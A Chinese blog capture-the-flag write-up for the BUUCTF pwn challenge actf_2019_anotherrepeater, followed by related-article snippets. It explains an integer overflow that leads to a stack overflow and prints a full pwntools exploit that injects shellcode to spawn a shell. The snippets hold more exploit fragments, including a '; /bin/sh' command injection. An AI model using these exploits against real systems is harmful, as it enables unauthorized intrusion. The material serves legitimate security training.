BUUCTF pwn actf_2019_anotherrepeater

最新推荐文章于 2023-05-10 19:50:56 发布
最新推荐文章于 2023-05-10 19:50:56 发布
阅读量1.7k 收藏 1
点赞数 1
分类专栏: pwn安全 文章标签: python shell pwn 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/stareforever/article/details/112793933
版权

查看程序保护
在这里插入图片描述
保护基本都没开

查看程序流程
main函数,然后进入到input函数
在这里插入图片描述
input函数
在这里插入图片描述
先输入buf的大小,这里有整数溢出,可以控制buf的大小
在这里插入图片描述
输入-10,可以发现buf的大小是65526,并且打印出buf的地址

那么read(0,&buf,v6)就会发生栈溢出,所以可以考虑在buf里写入shellcode,然后再控制程序流返回到buf处即可, 栈溢出大小是0x41b

完整ex

from pwn import *

context(log_level='debug')

#io=process("./ACTF_2019_AnotherRepeater")

io=remote("node3.buuoj.cn",28438)

io.recv()

io.sendline(str(-10))

buf=int(io.recv(8),16)

print(hex(buf))

io.recv()

#main=0x804877d

payload=asm(shellcraft.sh()).ljust(0x41b+0x4,b'A')+p32(buf)

io.sendline(payload)

io.interactive()
求是量子
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ciscn_2019_n_3
12-30
ciscn(全国大学生信息安全竞赛),2019年的一道题目,涉及到fastbin堆漏洞的利用。由于调用了system函数,所以漏洞利用的难度不大,推荐初学者练习。题解链接:...
buuoj Pwn writeup 236-240
yongbaoii的博客
08-31 436
236 qctf_2018_dice_game 逻辑也是比较的简单。 有个随机数,在栈上,有个栈溢出,答对五十次就可以了。 但是我们可以直接覆盖种子 种子也覆盖成0.这样我们就可以知道第一个数是多少了。 溢出一下就可以了。 exp #-*- coding:utf-8 -*- from pwn import* from ctypes import* context.log_level="debug" r=remote("node4.buuoj.cn","27598") lib = cdll.LoadLi
actf_2019_onerepeater
z1r0的博客
04-09 409
actf_2019_onerepeater 查看保护 简单题 功能二一个格式化漏洞,这个format是由功能1传的,先利用功能1+2配合起来泄露出Libc。 再利用这两个功能配合起来改printf_got为system,传入/bin/sh from pwn import * context(arch='i386', os='linux', log_level='debug') file_name = './z1r0' li = lambda x : print('\x1b[01;38;5;214m
buuctf-pwn write-ups (1)
CoLin的pwn小屋
05-01 396
buuctf-pwn 001-016题wp
ACTF_2019_ACTFNOTE(top chunk上移)
seaaseesa的博客
07-01 843
ACTF_2019_ACTFNOTE 首先,检查一下程序的保护机制 然后,我们用IDA分析一下,edit里存在溢出,可以直接修改top chunk的size 那么只需要把top chunk的size修改为-1,然后malloc(负数)即可将TOP chunk向前移动与已有的chunk重叠,然后通过申请空间,控制该程序结构体的指针即可实现任意地址读写。 #coding:utf8 from pwn import * #sh = process('./ACTF_2019_ACTFNOTE')
actf-2019-onerepeater
Stella_Leo的博客
08-24 311
深夜写题 int __cdecl main() { int v1; // [esp+Ch] [ebp-40Ch] char buf; // [esp+10h] [ebp-408h] sub_804864B(); while ( 1 ) { while ( 1 ) { puts("What you want to do?\n1) Input someing exciting to repeat!\n2) repeating!!!\n3) Exit");
ciscn-2019-pwn
11-29
【标题】"ciscn-2019-pwn"是一个与网络安全竞赛相关的主题,尤其聚焦于"Pwn"类别,这通常指的是破解或利用程序漏洞来获取系统控制权的挑战。2019年的CISCN(中国互联网安全大会)可能是这个挑战的背景,它是一个汇集...
PWM.rar_ARM7 汇编_PWN_pwm arm7
09-22
在ARM7处理器上实现PWM接口,需要理解ARM7架构、汇编语言以及PWN的具体工作原理。 ARM7是ARM公司设计的一系列32位RISC微处理器,以其低功耗、高性能和广泛应用而闻名。在ARM7处理器中,开发者可以使用C语言或汇编...
PWN.rar_AVR PWM_GPS FPGA_PWN_avr_avr pwn
09-23
【标题】"PWN.rar" 是一个包含与 AVR 单片机、PWM 脉冲输出、GPS 和 FPGA 相关资源的压缩包。其中,"AVR_PWM_GPS_FPGA_PWN_avr_avr_pwn" 可能是项目或文件集合的命名,暗示了这些技术的综合应用。 【描述】描述指出...
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
actf_2019_actfnote
doudoudedi
06-22 567
思路 通过溢出将topchunk的位置向上提然后申请堆块即可完成一次任意地址写入 exp: #!/usr/bin/python2 from pwn import * #p=process('./ACTF_2019_ACTFNOTE') p=remote('node3.buuoj.cn',26474) elf=ELF('./ACTF_2019_ACTFNOTE') libc=elf.libc def add(size,name,content): p.sendlineafter('$ ','1') p.
PWN做题笔记10-repeater(ALSR绕过)
qq_40923256的博客
05-10 385
泰山杯pwn部分的题目:repeater
BugkuCTF-PWNpwn7-repeater详细讲解多解法
am_03的博客
08-31 4023
知识点 解题流程 方法一 查看文件类型: 32位文件 查看保护机制 只开启了NX 32位IDA打开 伪码: 0x70=112 0x64=100 发现该题目为典型的格式字符串漏洞。 解题思路 此题的大概思路如下: 1、找到libc_start_main在栈内的偏移,使用%p暴露该地址 2、利用LibcSearcher猜测使用的libc,算出libc基址 3、计算出此libc的system地址 4、把prinf的got表改为system地址 5、执行system(’/bin/sh’) 具体调试 执行gd
repeater【攻防世界】
qq_41696518的博客
09-01 1593
repeater 攻防世界
bugku PWN repeater
alan___的博客
01-15 996
bugku PWN repeater exp分享
[Pwn]格式化字符串漏洞--2018科来杯 repeater
WitherC的练级之路
10-30 530
2018年山东省科来杯Pwn题目Repeater复现 补充一点汇编语言基础知识 对于我这种对汇编语言不怎么感冒的人来说,补充一些相应的汇编语言的基础知识还是很重要的 这里就针对本题中用到的汇编指令进行相应补充 lea与mov的区别:lea eax,[ebx+8]就是将ebx+8这个值直接赋给eax (相当于把地址赋给eax),而不是把ebx+8处的内存地址里的数据赋给eax。 而mov指令则恰恰相反,例如: mov eax,[ebx+8]则是把内存地址为ebx+8处的数据赋给eax。 cmp(compare
[BUUCTF-pwn]——qctf2018_stack2
Y_peak的博客
04-02 355
[BUUCTF-pwn]——qctf2018_stack2 这道题注意一点v3的类型就好, 其他应该木有什么可以说的吧, 它是char*类型., 也就是每个我们赋值的v7只有低位的一个字节可以写进去 漏洞就在这里, 可以利用这里, 以v3为基准修改任意地址的数据. 还有一点需要注意的是偏移, 我最一开始写的时候, 想当然写成了0x40+4 主要原因是因为画圈的位置改变了esp, 懒得看汇编往上面找了直接动态调试. 第一次执行该汇编的时候, eax就是我们开始输入的位置 然后直接定位到retn看栈顶
BUUCTF-PWN刷题记录-6
weixin_44145820的博客
04-14 828
目录picoctf_2018_are you rootciscn_2019_final_2 picoctf_2018_are you root 例行安全检查 菜单如下: 我们需要auth_level等于5才能get flag user结构体如下 struct USER{ char *name; long long auth_level; } 漏洞原理分析: 在login中分配了两次内存...
[BUUCTF-pwn]——bjdctf_2020_router
Y_peak的博客
03-16 300
[BUUCTF-pwn]——bjdctf_2020_router 关键漏洞, 如果输入 ; /bin/sh 就会执行system("/bin/sh") 分号是分割符 exploit from pwn import * p = remote("node3.buuoj.cn",27911) p.sendline('1') p.sendafter("Please input the ip address:\n", "; /bin/sh\x00") p.interactive() ...
BUUCTF pwn rip
最新发布
01-28
根据提供的引用内容,BUUCTF PWN-RIP是一个关于PWN技术的详解文章。文章中提到了64位的EIF文件中rbp寄存器的大小为8个字节。如果对这部分不太理解,可以阅读作者的另一篇关于PWN基础知识的文章。 BUUCTF PWN-RIP...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值